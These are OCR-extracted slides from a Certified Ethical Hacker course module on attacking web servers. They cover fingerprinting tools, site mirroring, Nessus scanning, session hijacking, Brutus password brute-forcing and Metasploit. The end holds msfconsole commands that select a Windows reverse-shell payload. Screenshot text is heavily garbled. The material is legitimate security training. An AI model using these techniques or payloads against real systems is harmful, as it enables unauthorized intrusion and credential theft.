  43. 43. Ethical Hacking and Countermeasures Hacking Webservers l'le'rcn. Ar= 'r Exam 312-50 Certified Ethical Hacker Search Web by Domain Evclore10-15745 web SIIES vlSllE‘d 3. users oltrie Search: site contains example: Results for microsoft Module 12 Page 1642 Found 252 sites u LJ 4 5 5 i: ”i: i 'iii i 'I turn * al tectvfi-it FVVI: .. a~i tern S 3FV3.‘: EV3 *i7i, ‘i_i, c7t ci: 'u 9 . c:: ate FVVl. li —. ,i'l corn 1: '*: iai 'Ti; d'1 rrii: r:>Ei: ift mm 1: gm 'Til: V./ TC? ! m-n :2 i-. i'idcv. su: date Fil: ' :3 update —m: oft com :4 . 'r1i: ':; Dttt. rarislatc' cum ‘.5 2earc’1.rWi; 'i; EJfl. :c'W Z5 Iww V'YVrflHs(DrElro—r‘ iagn Tii: *i: :aitonlIne cc'r'i er lll, ’l, l, Jt (Dru Site Report ®l@®l@WEi@l®lEFimlT£imEilBl1‘]l3l1‘JlEi@ ll-; -izra” Ti: i:i: ar microsoft site : o-ita ns First seen ; c; ; ia5 3rd »'-iigusi 25.112 Search tips lockup! —vet: ra’t Netblock OS -ietscaler "‘lC'C mm. -ic~: sc-'2 unL. n:~m »x. mr; zale' . .,, ,; mm. ii. Fe 2:: -i: ».: sc-< zcr: vmaa. -.5 ser-. er septa-n: e» -.995 -m. —sc~« : Cr: aim. netscaler cw: e'r*: é' :9-w= "‘lL’: S3'l zcr: |AFlkV7D‘. ‘."V "‘l£’C3 Y: Cllri. aetscaler "‘lC’C‘2'( li-“ted "‘ic'csc‘t : cv: "‘iC'Ci(: :t ICFS -ic. e'r: e'Z *5 'ii: t'nal leader. 1399 "‘l5’CEC'[ cor’/ ‘ ; EDuE". :: :5 wicrcscic cor: a~(a'riai tE: 'i'1clogieS éE't‘ai «zematianai : .t~ cigtai —i. eri'ela'1dltd mimcsciz tor: wmdciws ser-. er . .,[ FIGURE 12.14: Web server Footprinting Ethical Hacking and Countermeasures Copyright © by EC-Gullllcil All Rights Reserved. Reproduction is Strictly Prohibited.
  44. 44. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers if I r. 'l -9 ‘. 'I ‘. ,4} ‘Li ' . f—i_. - F1-l_~. it-4-_-I. - - - -I -Y. : iuJ, i,i alitgi J. o i - in. .~. i F. httprecon 7.3 - http: //www. nytimes. com:80/ ; £ X Elle Qorifiguration Fitgugriritirig flepcrtlng flelp Taget{SmDNE WebSoivei sii . I I N! // v / r times com 30 v I ‘Jwwy A -0 lDServe '1 " GET ems: -ng l GET long equestl GET non-exslihgl GET wrong Dmtocoli l- , ,,, E,, ,E, SEW, ,dE, ,,, ,,m. ,D, , U, ,,, ,y, V, M ’ ‘ I D S e Personal Security Freeware by Steve Gibson Cclpyllghl lo] 2003 by Gibson Research Corp Background Servav Query l oaA/ ueip l r Ema a copy / pixie an Internet server ua. DI IP eddies: here [example www micioscll com] 1 lwwvl gtmgle caml Wheri an inieinei LIHL Jl IP has been DIG‘/ ldefl above I2 9”" 7”’ 5"" 3 S‘ Dies: this button lo lnlllele a queiy of im speulied mm 7 l Hi: I E DiacleAppIcation$eivei109101220 as 6 59"" °*'W'°‘°= ="9 _ I 1: SunJava $y: iemWebSeivei 70 57 c o Aby: :Z5DD)<i 55 . . ApbChe2052 55 iii W WI ADeche226 55 ‘"*‘l‘‘‘'‘‘'”‘ . i rL. ..l. —FIEi’ K: R A-fa E K The server identified lsel at 4 9,5 http: //www. computer. ch goo, Quin ID Serve web page ca http: //www. grc. cam U. -i1ii‘: ii‘ia. -I3xli'5‘i . ,. -iii. :1II: Il: iitsfitanainaiII: taiin-i-[-i-iit-ziltfiiitqii‘fli-titlfliia-I Web Server Footprinting Tools We have already discussed about the Netcraft tool. In addition to the Netcraft tool, there are two more tools that allow you to perform web server footprinting. They are Httprecon and ID Serve. Httprecon *-—-’ Source: httg: [[www. computec. ch Httprecon is a tool for advanced web server fingerprinting. The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This software shall improve the ease and efficiency of this kind of enumeration. Ethical Hacking and Countermeasures Copyright © by [C-Clilllicll All Rights Reserved. Reproduction is Strictly Prohibited. Module 12 Page 1643
  45. 45. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers F httprecon 7.3 - http: //www. nytimes. com:80/ file gonfiguration Fingerprinting Beporting fielp Target [Sun 0NE Web Sewer 5.1] | hup; // 3 | www. ny! imes. com 5 |80 3 Analyze GET existing I GET long request I GET non—existing | GET wrong protocol I HEAD existing 0PT|0NS common ‘ ’ Match 2 D 0racle Application Server 109 10.1 .2. 2.0 58 81.830140811507011 SunJava System Web Server 7.0 57 80.2B1890140l3451 Abyss 2.5.0.0 X1 58 78. 87323943851 97 Apache 2.0.52 55 78.B7323EI43BB1E|7 Apache 2.2.5 56 78373239435519? )5 l"| /W. ..-. |«; ..-. I1 I: f! RC‘ 70 07". I". l‘304'JC| ?1 07 V Ready. FIGURE 12.15: Httprecon Screenshot ID Serve . - SOUFCCI hl. 'tQIHWWW. gFC. COfT1 ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the make, model, and version of any website's server software. This information is usually sent in the preamble of replies to web queries, but it is not shown to the user. ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information. Simply by entering any IP address, ID Serve will attempt to determine the associated domain name. Module 12 Page 1644 Ethical Hacking and Countermeasures Copyright © by [C-Culliisll All Rights Reserved. Reproduction is Strictly Prohibited.
  46. 46. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 0 ID Serve 5’ X Internet Server Identification Utility, V1 .02 I D S Personal Security Freeware by Steve Gibson “ Copyright [cl 2003 by Gibson Research Corp. flackground 38"‘/9' GU90’ I 08.A/ fielp F Enter or copy I paste an Internet server URL or IP addess here [examplez www. microsolt. com}: 1 www. google. comI (5 Quay The Serve! 6 When an Internet URL or IP has been provided above, press this button to hitiate a query of the specified server. ( Server query processing : 3 Server gws Content-Length 221 . ‘<-XSS-Protection 1, mode= b|ocl 1*: -Frame-Options SAMEORIGIN Connection close The server identified itsell as : a [grave fioto ID Serve web page FIGURE 12.16: ID Serve Module 12 Page 1645 Ethical Hacking and Countermeasures Copyright © by EC-Gulllicil All Rights Reserved. Reproduction is Strictly Prohibited.
  47. 47. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers - i '3!-—lfoi; r-—ii; -.' Va-_1.' _'lji'ii'= _r~l_t-j . ,‘Lt-—iljii-Ii, tol_lioigrfr‘e: S. ‘ I _'l_l. L'lI; -.'; '-(o)_l. ':l_i_L-, i‘ ‘. _i li'f= J_ir: i_T(: - -. .u- . - I Mirror a website to create a complete profile of the site's directory structure, files structure, external links, etc. l Search for comments and other items in the HTML source code to make footprinting activities more efficient Use tools HTTrack, WebCopier Pro, Blackwidow, etc. to mirror a website K T’ ‘ H sii. =.iiiiimm. —im. qig«. i.r, i': ,i2, «, i'u; ‘-, I.‘r<. ,i; .~. 1, nwi LLl- " “ T , 5-: gnu Leg mow jcl: i-__r. .4o. .-. ¢,. I -‘Iris mg. .. I‘ .1 «ii . . ( . _,, ,,, . mm» . . . ._i r, ,,. ... , rm: i fl . iuw. i.si. , ii. u — . ' ‘ . . / i7i1.'HI/ , m, ..». .m. w is». VTVII v. .v. m-». r.~r »- i I , 4 , —i I 4 i I I i 1 4 i I I . --. ., http: //www. httrack. com , ... _, 1'51 . _. "lIv. :IlIlllilll5‘l(§1>ll’Ai1I: l3I! lI'l'lll'| il'lIIl~$1!il! ll"VI'llllal(-(‘l Web Server Attack Methodology: Mirroring a Website Website mirroring is a method of copying a website and its content onto another server. By mirroring a website, a complete profile of the site's directory structure, file structure, external links, etc. is created. Once the mirror website is created, search for comments and other items in the HTML source code to make footprinting activities more efficient. Various tools used for web server mirroring include HTTrack, Webripper 2.0, WinWSD, Webcopier, and Blackwidow. C Source: http: [[www. httrack. com HTTrack is an offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link- structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. Module 12 Page 1646 Ethical Hacking and Countermeasures Copyright © by [C-Clilliicll All Rights Reserved. Reproduction is Strictly Prohibited.
  48. 48. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers H Site mirroring in progress [2/14 (+13), 327948 bytes] ~ [Test Projectwhtt] l; li ’‘ file Mirror Log flmdow flelp -' _ . local Disk <C: > 9 (EH-Tools In prugess Parsing HTML hie , . dell 0 -netpub l"l°"“5"°"‘ 2 [Mel Bytes saved 320,26lQB Lnks scanned 2/14 (>13) 3 Mywebsiles Tme Zmnlfi Fles wmen 14 3 Program Files Transfer rate 09/: (1_19iGE/5'; Flee updated 0 2 pwgmm H95 (X35) Naive comeaaons 1 BT00! 0 2 Users '1 Windows i NTUSERDAT 3 _ ‘ Local Disk <D: > scanning www ceniied'iad<er com/ is KIP 7 _, DVD RW Drive <E: > 2, __ New Volume <F: > Carcel Help NUM FIGURE 12.17: Mirroring a Website Module 12 Page 1647 Ethical Hacking and Countermeasures Copyright © by EC-Gallllcil All Rights Reserved. Reproduction is Strictly Prohibited.
  49. 49. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker l :4 u __l _I_ l '. 'I= J_T-i. =t :12.‘ may 3.! i i= ._t-l_t-: ;'A_i: : lite x i_t-1_t- :3 we: . "‘| ,l_i_i_t'-l_‘-r= _l_i-): l_l_l it’ ~‘i-r= _l| _i_| _i_l1t_Lg‘ . . . ... ._ Perform vulnerability scanning to identify weaknesses in a network and determine if the system can be exploited Sniff the network traffic to find out active systems, network services, applications, and vulnerabilities present Use a vulnerability scanner such as HP Weblnspect, I Nessus, Zaproxy, etc. to find hosts, services, and vulnerabilities Test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities . ... . http: //www. nessusorg I-. -ll-‘ ml ~I-.1=‘- ' ii: ':u1ii—M—4-‘t—t-Hii1-)I-. >.- -. -:- n lmtiirqiilan-. ii1-‘. i(. ;-l 4 Web Server Attack Methodology: Vulnerability * Scanning Vulnerability scanning is a method of determining various vulnerabilities and misconfigurations of a target web server or network. Vulnerability scanning is done with the help of various automated tools known as vulnerable scanners. Vulnerability scanning allows determining the vulnerabilities that exist in the web server and its configuration. Thus, it helps to determine whether the web server is exploitable or not. Sniffing techniques are adopted in the network traffic to find out active systems, network services, applications, and vulnerabilities present. Also, attackers test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities. Various tools are used for vulnerability scanning such as HP Weblnspect, Nessus, Paros proxy, etc. to find hosts, services, and vulnerabilities. / Nessus _ Source: http: [[www. nessus. org Nessus is a security scanning tools that scan the system remotely and reports if it detects the vulnerabilities before the attacker actually attacks and compromises them. its five features includes high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture with features Module 12 Page 1648 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcli All Rights Reserved. Reproduction is Strictly Prohibited.
  50. 50. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers that enhance usability, effectiveness, efficiency, and communication with all parts of your organization. . ... .|». ..| ... ..| ... .. Report: Iibbill scan: Polclu than corlblihi 3 Edll FU"— same network Congoauon mm Inlernnl Network Scar Re Parallel Ccrnector: 31 Conqeslon 0 , _mW . ... ,.t. ..m . :vgestbr gum LI'IuxD'I'y) Q D“7,, MM eon se-mm TCf‘€‘. cor I 3NMl" 5:11.‘ 9 Prvgvbd (1 I in» van wnuai xsn xrarr fl 5°" : ~'N Gun FA ‘k(slalWMIGvan H Mum vssuscar itspor eiltng Port sc-n Oplloru Fm smr Range Safe Check: smut llnnon1In<1II Lou Suili oaulis Lu 3¢| (V ""'°"""'°° sic; um Scan on Dii: :>''Io: ' V-I 0"°**’ "W "03’ amt: ‘a<)lio<llM|5-(arm lluir Wnlit VIrrnrv C: rI: |¢er U'1:r: unrv: d Port: on Closed Nctrvxk l'l¢cc|4a VI-rcout ibccandai paw nlu Husl: by um I: -H3 Na na Max Grwutanooua rcr Session) rm liar my wn l'ar*omI < I‘ v vaumu »«-y Marv FIGURE 12.18: Nessus Screenshot Module 12 Page 1649 Ethical Hacking and Countermeasures Copyright 0 by M All Rights Reserved. Reproduction is Strictly Prohibited.
  51. 51. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers - 4 ‘ '. 't-.1?-in = ¢_'o. * *l= )_"l it i i= _uJ_t«: ;'A_t: i l_i. ioii_li-1_koi_-r}+-1 l 51 ‘-K1-‘Elo)_i_l _i_U}= _l~J_5 $1113 l . . . ... . _ Sniff valid session IDs to gain unauthorized access to the Web Server and snoop the data Use session hijacking techniques such as session lixation, session sidejacking, Cross-site scripting, etc. to capture valid session cookies and IDs Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking k‘u'pS. A‘eIreée'1‘(n. l-‘(ll - = ' * ‘ 7 ‘ l, Hiu_‘e ll‘Jl‘S| !l Mll, llH . ,u, l ri l V l . . . ;. l.1 ll M m—. —gr~‘ DYZJL: ru': ArAr: l'i'1' . c.. . 1': -Ins: -'71:‘: h‘! v:: ‘w . “.4”: (Y -j y . m y4l—ll— All l my ‘lllIFnj. , h‘r: lI-‘iHM‘nn*'im My mum r. . 15‘ . .~. i. .." . -—. ... .rg_. .s. t.« , :11‘ mn mu: ‘— ‘l on-" ‘ ’ l -1 4 nm. iNlmWnrrmr'm . i.~. .,. . l l . J 1 nrw . ‘ i _i 'rvr. m —n—i— ( . . j, I -' 4 r 4 . ,1 , , , 4 l n l . — l ‘l l mu 7 l‘ > ' 4 I rulll ‘ll ' ‘ cunawru Vll>1l¢1l. ‘i i—4 ll . 3 u . J , ‘— ‘i it <—_J 5*} . . J w l ‘ » ll ' http. -// portswiggemet Note: For complete coverage of Session Hijacking concepts and techniques refer to Module 11: Session Hijacking U. -mu inn. -I3xH'5‘f . ,. -fl v~: llINNh5ii(%H>ll'Ai5Iii3!lI'l'[‘l'| il'ZI"«$1lil! ii"VI'iillai(-Oi Web Server Attack Methodology: Session Hijacking . _. Session hijacking is possible once the current session of the client is identified. Complete control of the user session can be taken over by the attacker once the user establishes authentication with the server. With the help of sequence number prediction tools, attackers perform session hijacking. The attacker, after identifying the open session, predicts the sequence number of the next packet and then sends the data packets before the legitimate user sends the response with the correct sequence number. Thus, an attacker performs session hijacking. In addition to this technique, you can also use other session hijacking techniques such as session fixation, session sidejacking, cross—site scripting, etc. to capture valid session cookies and IDs. Various tools used for session hijacking include Burp Suite, Hamster, Firesheep, etc. 1 Burp Suite Source: htt ortswi er. net Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. The key components of Burp Suite include proxy, scanner, intruder tool, repeater tool, sequencer tool, etc. Module 12 Page 1650 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  52. 52. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers burp suite free edition vl.4.01 " zurp nirucer repeater MIIGDW about '.3igeI spider intruder repeal-: -i S-’: l:l. I-': ’7C-El decoc». -r co-nparer options alerts : "-r "I . r 4:00-.1 filter: nicing not Iauno it-am; hiding (:35, image and general cinari ccnl-: -nt riic ng Jr: responses nicing empty Iolders e '": : " v I i ‘ no ncc URL paiarn status I ng‘n 9 mm "Eamon um com http Ilecition cn GET Ielemenllssi/ inlllbreaking_newsI3 V 200 576 , >;‘ele__: __ liw , i : . ; -. V _| http: fedition. cnn. comI. eIement * . . I 1 r». ii». ‘ , add iiemtci scape said-: -rtnis srancri engagement tools [pro version onlij D compare site maps ' PI EKDBFH1 W305“ ‘5U'3I'lS€ rezu-: «sI "Dana mquesled "ems 1.-i para~i: neacers her “we bunch T .51-. ment asi incl l>: eakxnq_nevs, 3.0/In-inner. hcni1“ce1ID= «_sii A CODy URLs inthis branch Tp/1,1 cop, Iimzs intriis branch 5‘: 94“ ‘°"'°““'°°“‘ e: —Aqenc: Ho: L1la’5.D IU. I.nd-av: NT L" .3: UOVE4; EV: l5.Ui 53"? 5e'9C‘9d "°'"5 ckci 20100101 F1retox, ’L5.0.1 Accept: cexr - javascr ipr, re-xr ’hcm1, aipplicaicxon/ xml, text xml, L _ ~ 0 r~iai: hes Ii _ FIGURE 12.19: Burp Suite Screenshot Module 12 Page 1651 Ethical Hacking and Countermeasures Copyright © by [G-cullncil All Rights Reserved. Reproduction is Strictly Prohibited.
  53. 53. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ". 'I: J_T-i; t:J-_'i‘ *I= Ji_'i‘ _'4_lil'r, _io-l_t«1 ; 'A_t: ~il_i1oi3._l-l_toi_- rid, -1 flu —I I 7 . :2 (I. it-. i -J} : .1i, u I '. 'I: J_. -- : ‘=, t:i~‘’. ‘l~)_(°. _i= ‘ . . . '.. . . - I Q Brutus — AET2 - www. hoobie. net/ brutus - (January 2000) . ' I B X Use password cracking techniques such as brute - - 5 - force attack, dictionary Tavoet 10 0 0 VI attack, password guessing to Cumection Dot-on: crack webserver passwords Port 30 Ty9ejHllP[BatiCAuth]; siaii sioo cieai I UseProw Deiine 10 Timeoix ’ W 10 Covviectnm F _ _ Use tools such as Brutus, THC-Hydra, etc. L, HTTP[Ba: icIUptrons Method HEAD V’ 77 Keeoéihve Auihemcsic-n Opium: Pas: Mode iwoia usi L W Ust-Username Sn¢e User User File ii-.1-ii lid Browze ‘mid; lxt Pas: File BIOWSC _ I‘ POZIVWQ Auiimiiic-aim Flea): Mp I ‘Target inririw l| Z|| JC| l7/ j Pauwoid academic j Type , ' Uflemame HTlF’| Ba: rf Amhl admin HTTP ism Aim backup Loosled and nzlaledl aimer-i-ca-on we in; lVillIi'3lI‘l7I] large! 10 0 0 r7 veilied Opened we lie ci:1Isrmg 5 am: Opened puwaii tile Cmiallig are PJELWOIGS MSXINIUITI mime: oi sui. er. i.: sim aiemri: Will be 4908 1 EngsgnigiaigeiiUOUi7wii>iHIIPisa: icAui>i| ri. .~. ... .,-s. ... WM http: //www. hoobie. n2t '. ')ull :2i‘II. -I3xH'5‘f . ,. -fli. :lII: I7:IiisiitanairuiII: rarii-i-[-i-rit-ziltfiiirqii‘flr-tiilflira-I Web Server Attack Methodology: I-Iacking Web Passwords _. One of the main tasks of any attacker is password hacking. By hacking a password, the attacker gains complete control over the web server. Various methods used by attackers for password hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks, syllable attacsk, precomputed hashes, rule-based attacks, distributed network attacks, rainbow attacks, etc. Password cracking can also be performed with the help of tools such as Brutus, THC-Hydra, etc. Brutus Source: httQ: [[www. hoobie. net Brutus is an online or remote password cracking tools. Attackers use this tool for hacking web passwords without the knowledge of the victim. The features of the Brutus tool are been explained briefly on the following slide. Module 12 Page 1652 Ethical Hacking and Countermeasures Copyright © by [C-Clilllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  54. 54. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 0 Brutus - AET2 - www. hoobie. net/ brutus - (January 2000) ' E ’‘ Eile Iools flelp Target 10.0. 0.17] Type HTTP [Basic Auth] L Start Stop Clear Connection Options Port 80 Connections '_ 10 Timeout r 10 _ U38 PIOKV Define HTTP [B asic) Options Method HEAD V l7 Keep/ Alive Authentication Options W Use Username l_ Single User Pass Mode Word List V User File useistxt Browse pass me wordstxt Browse Positive Authentication Results Target I Type 1 Username I Password l 10 0.0 17/ HTTP [Basic Authl admin academic 10.00.17! HTTP [Basic Auth] backup Located and installed 1 authentication plug-ins / lnitialising. .. Target 10.0.0.1? verilied Opened user file containing 5 users. Opened password file containing 818 Passwords. Maximum number ol authentication attempts will be 4908 Engaging target 10.0.0.1? with HTTP [Basic Auth] Tm--m -main = ma- = i-lmin FIGURE 12.20: Brutus Screenshot Module 12 Page 1653 Ethical Hacking and Countermeasures Copyright © by [C-Clilliisll All Rights Reserved. Reproduction is Strictly Prohibited.
  55. 55. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ; w_iu -at ~. i._l-. .« 3 it v. » V « . L=i 1 .13. . - Webserver Attack Tools Attack Methodology Webserver Concepts H-n-I 4 counter- measures Patch Management Webserver Security Tools Webserver Pen Testing L-I’-M 1'5 '1 . ,. -.'1 v. :llIlllilll5il(¥H>ll’AilIilillflltl‘l'| il'ZIIi~$1!ll! ll'IU| ' Module Flow The tools intended for monitoring and managing the web server can also be used by attackers for malicious purposes. In this day and age, attackers are implementing various methods to hack web servers. Attackers with minimal knowledge about hacking usually use tools for hacking web servers. I Webserver Concepts Webserver Attacks sva Attack Methodology Webserver Attack Tools * ( Webserver Pen Testing $4 Webserver Security Tools / Patch Management Counter-measures This section lists and describes various web server attack tools. Ethical Hacking and Countermeasures Copyright © by [C-Ciiliiicll Module 12 Page 1654 All Rights Reserved. Reproduction is Strictly Prohibited.
  56. 56. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker . *.*! =J_T-in = -L’-. ' itsi-_'-I _'4_t i ‘taro-J_t-. . Lilo i - l_l: -‘ti . ._t'i_t: iir: _r: i3)_li-)_1i: .. _. .. . _ The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms It supports fully automated exploitation of web servers, by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNM tfgrgetasploit‘ co. -vi. .. Iugrl Syllvm am. .. rmmumi-vi. -4 nooui Motto-150v-<nI(lopS: i '7 4 0 http: //www. metaspIoit. com -—-Isa 1'! '1 . ,. —.'1 v. :lllllliliT5ii(§1>ll'A4lIifillflltl'l'| il'iIIl«$1!ll! ll'IU| ' Web Server Attack Tools: Metasploit ‘T ll’ Source: httpzggwww. metasploitcom The Metasploit framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. It enables users to identify, assess, and exploit vulnerable web applications. Using VPN pivoting, you can run the NeXpose vulnerability scanner through the compromised web server to discover an exploitable vulnerability in a database that hosts confidential customer data and employee information. Your team members can then leverage the data gained to conduct social engineering in the form of a targeted phishing campaign, opening up new attack vectors on the internal network, which are immediately visible to the entire team. Finally, you generate executive and audit reports based on the corporate template to enable your organization to mitigate the attacks and remain compliant with Sarbanes Oxley, HIPAA, or PCI DSS. Metasploit enables teams of penetration testers to coordinate orchestrated attacks against target systems and for team leads to manage project access on a per-user basis. In addition, Metasploit includes customizable reporting. Metasploit enables you to: *3 Complete penetration test assignments faster by automating repetitive tasks and leveraging multi-level attacks Module 12 Page 1655 Ethical Hacking and Countermeasures Copyright © by [C-Ciilllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  57. 57. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 6 Assess the security of web applications, network and endpoint systems, as well as email users 6 Emulate realistic network attacks based on the leading Metasploit framework with more than one million unique downloads in the past year 6 Test with the world's largest public database of quality assured exploits 8 Tunnel any traffic through compromised targets to pivot deeper into the network 8 Collaborate more effectively with team members in concerted network tests 8 Customize the content and template of executive, audit, and technical reports - . Q) ggetasploit uonrvw-n nAu; ,~. .io -. «~. «. . «i0 C<II", —A, ’ - vlll kg‘ ~, V. )v‘. .<- up ,5’-torn In-to Ovflfii - r- .1; . - ‘"1 I . . 9 ‘larger Syllem smut ope: -ring synenn (Top 3) . 33 Vailflol Wfl1X C '4? DKVKVOII II 7 Ll'. u I X'&‘t~leu O I I. :I-xahrri e x-tuo-so o 2 R-'y<0'-ertnooeu ‘I I . I l<PQ"(C§))I'¢ Drona Activity in Moon) Nehuonr services (Top 9) . I33 XUWC SFWVS 7 HI »$V k'U| <t) ‘/1 ‘ 3 §; l;’; i'; '§? .’?1'. §i"s. ..«. . - C 3‘: ~ lfiD" SONKQI Q FIGURE 12.21: Metasploit Screenshot Module 12 Page 1656 Ethical Hacking and Countermeasures Copyright © by E0-Gallllcil All Rights Reserved. Reproduction is Strictly Prohibited.
  58. 58. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers . ‘_. i , - i_~. ,7I. l-7:‘ , _ . a i . _'i_i. i l'2_Fj ; i_i-ijl 1. ,4, .1 -.43.] (.41 -i . . it 1.1.1 ». _: g g. _ T '1 .13. . . Libraries Rex —r . CU5t°m Pll-| €'ln5"" _ Framew°rk_C°re : Protocol Tools F’ FramewAork-Base <__: interfaces -- ' -- Modules mfsmnsole Security Tools Exploits , "ll _ msfcli P3Vl°3d5 ‘ — " Web Services msfweb Integration Encoders msfwx NOPS msfa pi Auxiliary U. -igii : ii‘ia. -I3t'H'5‘f . ,. ’llV. :llIillfiln5‘i(§13ll'AilIififlflltl‘l'| ii'il"«$11ll! il"VI'lillnl(-(‘l Metasploit Architecture The Metasploit framework is an open-source exploitation framework that is designed to provide security researchers and pen testers with a uniform model for rapid development of exploits, payloads, encoders, NOP generators, and reconnaissance tools. The framework provides the ability to reuse large chunks of code that would otherwise have to be copied or reimplemented on a per-exploit basis. The framework was designed to be as modular as possible in order to encourage the reuse of code across various projects. The framework itself is broken down into a few different pieces, the most low-level being the framework core. The framework core is responsible for implementing all of the required interfaces that allow for interacting with exploit modules, sessions, and plugins. it supports vulnerability research, exploit development, and the creation of custom security tools. Module 12 Page 1657 Ethical Hacking and Countermeasures Copyright © by [C-Ciilllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  59. 59. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Libraries Rex CU5l°m P| UE'in5--" ; - Protocol Tools Framework-Core Framework-Base 2 4 Interfaces --5 5 '--- Modules f I , ' Ex loits m sconso e Secunty Tools P msfdi , Payloads Web Services mgfweb Encoders Integration msfwx rnsfapl Auxlllary FIGURE 12.22: Metasploit Architecture Module 12 Page 1658 Ethical Hacking and Countermeasures Copyright © by EC-Cflllilcil All Rights Reserved. Reproduction is Strictly Prohibited.
  60. 60. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ; 'l_i=1ir: _i:1_‘; i_i-xiii: /: }.", '_3fl0)-ji ; k'Lk‘| |°‘. _h'. ,l. ‘;k= -‘ Clix , I_ It is the basic module in Metasploit used to encapsulate an exploit using which users target many platforms with a single exploit This module comes with simplified meta-information fields Using a Mixins feature, users can also modify exploit behavior dynamically, brute force attacks, and attempt passive exploits Steps to exploit a system follow the Metasploit Framework Configuring Active Exploit ‘ 5 g Verifying the Exploit Options xix s , Selecting a Target _/ 5 ; Launching the Exploit _ Q . . _. -.'l v. :‘IINNn! ~‘; (§13I| 'AifI: l3I! lI'l'l‘l1ii'Zl'l~$1Iillil‘‘uI'lfllai(-('i ‘ ‘ , Selecting the Payload A I 3 9.9 Metasploit Exploit Module The exploit module is the basic module in Metasploit used to encapsulate an exploit using which users target many platforms with a single exploit. This module comes with simplified meta-information fields. Using a Mixins feature, users can also modify exploit behavior dynamically, perform brute force attacks, and attempt passive exploits. Following are the steps to exploit a system using the Metasploit framework: *3 Configuring Active Exploit *3 Verifying the Exploit Options *3 Selecting a Target '3 Selecting the Payload ‘:2 Launching the Exploit Module 12 Page 1659 Ethical Hacking and Countermeasures Copyright © by [C-Culllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  61. 61. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers I Metasploit Payload Module a Payload module establishes a communication channel between the Metasploit framework and the victim host a It combines the arbitrary code that is executed as the result of an exploit succeeding N 4 To generate payloads, first select a payload using the command: Ff Command Prompt msf > use windows/ she11_reverse_tcp msf payload(she11_reverse_tr: p) > generate -h Usage: generate [options] Generates a payload. OPTIONS: (opt) The list of characters to avoid: 'xO0x££' <opt> The name of the encoder module to use. Help banner. <opt> A comma separated list of options in vAR= VlL format. <opt> NOP sled length. <opt> The output type: ruby, perl, c, or raw. msf payload(she1l_zeverse_tcp) > Copyright 9 by E-Gflflil. All Rights Reserved. Reproduction is Strictiy Prohibited. Metasploit Payload Module The Metasploit payload module offers shellcode that can perform a number of interesting tasks for an attacker. A payload is a piece of software that lets you control a computer system after its been exploited. The payload is typically attached to and delivered by the exploit. An exploit carries the payload in its backpack when it break into the system and then leaves the backpack there. With the help of payload, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. To generate payloads, first select a payload using the command: Module 12 Page 1660 Ethical Hacking and Countermeasures Copyright © by [G-Gfifli All Rights Reserved. Reproduction is Strictly Prohibited.
  62. 62. Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker Hacking Webservers Command Prompt msf > use windows/ she1l_reverse_tcp msf payload(she1l_reverse_tcp) > generate —h Usage: generate [options] Generates a payload . OPTIONS: -b <opt> The list of characters to avoid: 'x0Oxff' —e <opt> The name of the encoder module to use. -h Help banner. -0 <opt> A comma separated list of options in VAR= VAL format. -5 <opt> NOP sled length. —t <opt> The output type: ruby, perl, c, or raw. msf payload(she11_reverse_tcp) > FIGURE 12.23: Metasploit Payload Module Module 12 Page lbbl Ethical Hacking and Countermeasures Copyright 4.0 by [G-Go| ||cII All Rights Reserved. Reproduction is Strictly Prohibited.
